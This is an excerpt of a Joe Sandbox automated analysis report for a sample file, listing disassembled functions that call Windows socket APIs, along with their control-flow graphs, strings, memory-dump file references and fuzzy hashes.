                                                          • Associated: 00000000.00000002.1628140762.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629017905.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000E6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000FEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000001103000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629521347.00000000011F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629689923.00000000013A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629757165.00000000013A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_850000_oJkvQZYkrx.jbxd
                                                          Similarity
                                                          • API ID: recv
                                                          • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                                          • API String ID: 1507349165-640788491
                                                          • Opcode ID: eaf901a18a805ad72467950c006191a0e16c2f82867ae52a94c34a14514407e3
                                                          • Instruction ID: 0a11583638c5b59a1473174e1d08162b0f67aaac16769f7495192d6c04546893
                                                          • Opcode Fuzzy Hash: eaf901a18a805ad72467950c006191a0e16c2f82867ae52a94c34a14514407e3
                                                          • Instruction Fuzzy Hash: FB112EB46183047FD1109B19BC49E273B5CEB85B6AF055A64FC08A3382D6515C0CC1B2
                                                          Function 008575E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1664 8575e0-8575ed 1665 857607-857629 socket 1664->1665 1666 8575ef-8575f6 1664->1666 1667 85763f-857642 1665->1667 1668 85762b-85763c call 8572a0 1665->1668 1666->1665 1669 8575f8-8575ff 1666->1669 1668->1667 1670 857601-857602 1669->1670 1671 857643-857699 call 8572a0 call 85cb20 call bd8c50 1669->1671 1670->1665
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1628140762.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                          • Associated: 00000000.00000002.1628113412.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629017905.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000E6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000FEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000001103000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629521347.00000000011F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629689923.00000000013A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629757165.00000000013A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_850000_oJkvQZYkrx.jbxd
                                                          Similarity
                                                          • API ID: socket
                                                          • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                                          • API String ID: 98920635-842387772
                                                          • Opcode ID: 3b27aabc9e1576c1c284fed5ee808495ddb8690b089bf4e65ac54feac38fe56b
                                                          • Instruction ID: b3681ee3de88d8bf5ba4870aab6aa8446e7901204c5c5bd9a3cbd3bb14b442b3
                                                          • Opcode Fuzzy Hash: 3b27aabc9e1576c1c284fed5ee808495ddb8690b089bf4e65ac54feac38fe56b
                                                          • Instruction Fuzzy Hash: B71129716543116FD6205B6D6C46F5B3BD8EB81726F095A24F804E22E2D252885CC2A2
                                                          Function 00BD8E90 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 125COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1849 bd8e90-bd8eb8 _open 1850 bd8eff-bd8f2c call bd9f70 1849->1850 1851 bd8eba-bd8ec7 1849->1851 1861 bd8f39-bd8f51 call bd8ca8 1850->1861 1853 bd8ec9 1851->1853 1854 bd8ef3-bd8efa call bd8d20 1851->1854 1857 bd8ecb-bd8ecd 1853->1857 1858 bd8ee2-bd8ef1 1853->1858 1854->1850 1859 c94b70-c94b87 1857->1859 1860 bd8ed3-bd8ed6 1857->1860 1858->1853 1858->1854 1862 c94b89 1859->1862 1863 c94b8a-c94bb1 1859->1863 1860->1858 1864 bd8ed8 1860->1864 1868 bd8f30-bd8f37 1861->1868 1869 bd8f53-bd8f5e call bd8cc0 1861->1869 1867 c94bb9-c94bbf 1863->1867 1864->1858 1870 c94bd9-c94bfb 1867->1870 1871 c94bc1-c94bcf 1867->1871 1868->1861 1868->1869 1869->1851 1876 c94bfd-c94c04 1870->1876 1877 c94c06-c94c1b 1870->1877 1873 c94bd5-c94bd8 1871->1873 1876->1877 1878 c94c1d-c94c32 1876->1878 1877->1871 1878->1873
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1628140762.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                          • Associated: 00000000.00000002.1628113412.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629017905.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000E6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000FEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000001103000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629521347.00000000011F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629689923.00000000013A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629757165.00000000013A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_850000_oJkvQZYkrx.jbxd
                                                          Similarity
                                                          • API ID: _open
                                                          • String ID: terminated$@
                                                          • API String ID: 4183159743-3016906910
                                                          • Opcode ID: a94cdde1c1ed84f332c995eb243376dfee953e5cd3303b6a763e7f1d27a75762
                                                          • Instruction ID: c7720341205c3e2456c68f6da9a2706b1f8e8383fc91214f763bacbb1e550517
                                                          • Opcode Fuzzy Hash: a94cdde1c1ed84f332c995eb243376dfee953e5cd3303b6a763e7f1d27a75762
                                                          • Instruction Fuzzy Hash: 054179B49043058FCB10EF7AD444A6EBBE4EB88314F048AAEE894D7350E774D805CF56
                                                          Function 0088A150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1881 88a150-88a159 1882 88a15f-88a17b 1881->1882 1883 88a250 1881->1883 1884 88a249-88a24f 1882->1884 1885 88a181-88a1ce getsockname 1882->1885 1884->1883 1886 88a1d0-88a1f5 call 86d090 1885->1886 1887 88a1f7-88a214 call 88ef30 1885->1887 1894 88a240-88a246 call 894f40 1886->1894 1887->1884 1892 88a216-88a23b call 86d090 1887->1892 1892->1894 1894->1884
                                                          APIs
                                                          • getsockname.WS2_32(?,?,00000080), ref: 0088A1C7
                                                          Strings
                                                          • getsockname() failed with errno %d: %s, xrefs: 0088A1F0
                                                          • ssloc inet_ntop() failed with errno %d: %s, xrefs: 0088A23B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1628140762.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                          • Associated: 00000000.00000002.1628113412.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629017905.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000E6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000FEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000001103000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629521347.00000000011F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629689923.00000000013A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629757165.00000000013A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_850000_oJkvQZYkrx.jbxd
                                                          Similarity
                                                          • API ID: getsockname
                                                          • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                                          • API String ID: 3358416759-2605427207
                                                          • Opcode ID: cea6f020f9cf2c123deae77befbf0a652fc419d7600d308045bbfec42247b0ef
                                                          • Instruction ID: 1f80719b9c660c689c0f538d37ca1f46c24ecd3ad18dfa44ce59a21ff084a35b
                                                          • Opcode Fuzzy Hash: cea6f020f9cf2c123deae77befbf0a652fc419d7600d308045bbfec42247b0ef
                                                          • Instruction Fuzzy Hash: 9C21E931948680AAF6259B19EC46FE773ACFF81328F040615F99893051FF32598687E3
                                                          Function 0086D5E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1901 86d5e0-86d5ee 1902 86d652-86d662 WSAStartup 1901->1902 1903 86d5f0-86d604 call 86d690 1901->1903 1905 86d664-86d66f 1902->1905 1906 86d670-86d676 1902->1906 1909 86d606-86d614 1903->1909 1910 86d61b-86d651 call 877620 1903->1910 1906->1903 1907 86d67c-86d68d 1906->1907 1909->1910 1915 86d616 1909->1915 1915->1910
                                                          APIs
                                                          • WSAStartup.WS2_32(00000202), ref: 0086D65B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1628140762.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                          • Associated: 00000000.00000002.1628113412.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629017905.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000E6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000FEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000001103000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629521347.00000000011F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629689923.00000000013A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629757165.00000000013A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_850000_oJkvQZYkrx.jbxd
                                                          Similarity
                                                          • API ID: Startup
                                                          • String ID: if_nametoindex$iphlpapi.dll
                                                          • API String ID: 724789610-3097795196
                                                          • Opcode ID: 884f72a0fb86f207852f0c960f4fca81177322ac075aa7fd43a390a3d2f53db0
                                                          • Instruction ID: 135378608796ab7e3bca4c4fd04ac7a0545b24a16a36f80da94d533a8b08b721
                                                          • Opcode Fuzzy Hash: 884f72a0fb86f207852f0c960f4fca81177322ac075aa7fd43a390a3d2f53db0
                                                          • Instruction Fuzzy Hash: D301F7D0F403411AF7117B3DDD1B3A62590AB61304F491968E848D62D3FA69C99CC2A3
                                                          Function 0091AA30 Relevance: 4.9, APIs: 3, Instructions: 377networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • socket.WS2_32(FFFFFFFF,?,00000000), ref: 0091AB9A
                                                          • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0091ABE3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1628140762.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                          • Associated: 00000000.00000002.1628113412.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629017905.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000E6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000FEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000001103000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629521347.00000000011F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629689923.00000000013A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629757165.00000000013A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_850000_oJkvQZYkrx.jbxd
                                                          Similarity
                                                          • API ID: ioctlsocketsocket
                                                          • String ID:
                                                          • API String ID: 416004797-0
                                                          • Opcode ID: 4018ef51de06049cce49740292e63ed52dbb149917446be63f30d51621f65220
                                                          • Instruction ID: f9d6de8aee4d436674e4dfb3b59dfd9da40ebf72c660303751f96bd161951a7e
                                                          • Opcode Fuzzy Hash: 4018ef51de06049cce49740292e63ed52dbb149917446be63f30d51621f65220
                                                          • Instruction Fuzzy Hash: CCE1CE707053059BEB20CF24C884BABB7E9EF89310F144A2DF9998B291D775DD84CB92
                                                          Function 008578B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1628140762.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                          • Associated: 00000000.00000002.1628113412.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629017905.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000E6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000FEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000001103000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629521347.00000000011F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629689923.00000000013A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629757165.00000000013A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_850000_oJkvQZYkrx.jbxd
                                                          Similarity
                                                          • API ID: closesocket
                                                          • String ID: FD %s:%d sclose(%d)
                                                          • API String ID: 2781271927-3116021458
                                                          • Opcode ID: 677b2d0393b3f03cf86b03997a078dcdb3a94f50d5e8d1ffee0b03ead2dff54b
                                                          • Instruction ID: 2a4c34e673428698a94683be7cc714958f9301d7e9ce95c56f218d22e96dbd0f
                                                          • Opcode Fuzzy Hash: 677b2d0393b3f03cf86b03997a078dcdb3a94f50d5e8d1ffee0b03ead2dff54b
                                                          • Instruction Fuzzy Hash: 27D05E22A0A2206B85206698BC44C5B7BA8EEC6F60B055A68F884B7210D2219C0583F3
                                                          Function 0091B060 Relevance: 3.0, APIs: 2, Instructions: 48networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,0091B29E,?,00000000,?,?), ref: 0091B0B9
                                                          • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,00903C41,00000000), ref: 0091B0C1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1628140762.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                          • Associated: 00000000.00000002.1628113412.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629017905.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000E6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000FEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000001103000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629521347.00000000011F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629689923.00000000013A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629757165.00000000013A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_850000_oJkvQZYkrx.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastconnect
                                                          • String ID:
                                                          • API String ID: 374722065-0
                                                          • Opcode ID: 15b85235aa83cffdb96513d3946ef7fc3faa197af0ea5952cc30ee0ac4f590e1
                                                          • Instruction ID: aa46ff12d6b98d7f0b1f4f349d5f012d1cac8eee6f05c30735b201ddd7e796e8
                                                          • Opcode Fuzzy Hash: 15b85235aa83cffdb96513d3946ef7fc3faa197af0ea5952cc30ee0ac4f590e1
                                                          • Instruction Fuzzy Hash: 5501D8363042045BDA209A79D944FABB79AFF8D374F040B18F978A31E1D726ED908751
                                                          Function 00904950 Relevance: 1.7, APIs: 1, Instructions: 170networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • gethostname.WS2_32(00000000,00000040), ref: 00904AA5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1628140762.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                          • Associated: 00000000.00000002.1628113412.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629017905.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000E6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000FEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000001103000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629521347.00000000011F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629689923.00000000013A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629757165.00000000013A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_850000_oJkvQZYkrx.jbxd
                                                          Similarity
                                                          • API ID: gethostname
                                                          • String ID:
                                                          • API String ID: 144339138-0
                                                          • Opcode ID: ad01948f4a12d362656151c6803768be93372dcc7baa91c953267368d3c8f637
                                                          • Instruction ID: 89d0cf342d3db13c87eb0b4381625ff86753ddce76f5c69d0f2f939dd0d4b960
                                                          • Opcode Fuzzy Hash: ad01948f4a12d362656151c6803768be93372dcc7baa91c953267368d3c8f637
                                                          • Instruction Fuzzy Hash: 7E5102F06043009FE7309F65DE4972776E8EF81715F14083DEA9A8A6E1E778E884CB02
                                                          Function 0091AF70 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • getsockname.WS2_32(?,?,00000080), ref: 0091AFD1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1628140762.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                          • Associated: 00000000.00000002.1628113412.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629017905.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000E6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000FEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000001103000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629521347.00000000011F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629689923.00000000013A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629757165.00000000013A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_850000_oJkvQZYkrx.jbxd
                                                          Similarity
                                                          • API ID: getsockname
                                                          • String ID:
                                                          • API String ID: 3358416759-0
                                                          • Opcode ID: fab9e89ac2b9344bec145600df71ba48997b550a6aaeddad28b97105d81619c4
                                                          • Instruction ID: 397089890a7a5ab107b93ce39d02c6706890023f527ed8508fdce22e8472b7a3
                                                          • Opcode Fuzzy Hash: fab9e89ac2b9344bec145600df71ba48997b550a6aaeddad28b97105d81619c4
